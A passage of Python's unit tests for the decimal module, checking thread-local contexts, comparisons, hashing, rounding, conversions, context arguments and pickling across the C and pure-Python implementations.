cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
class CThreadingTest(ThreadingTest):
decimal = C
@unittest.skipUnless(threading, 'threading required')
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
pass
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
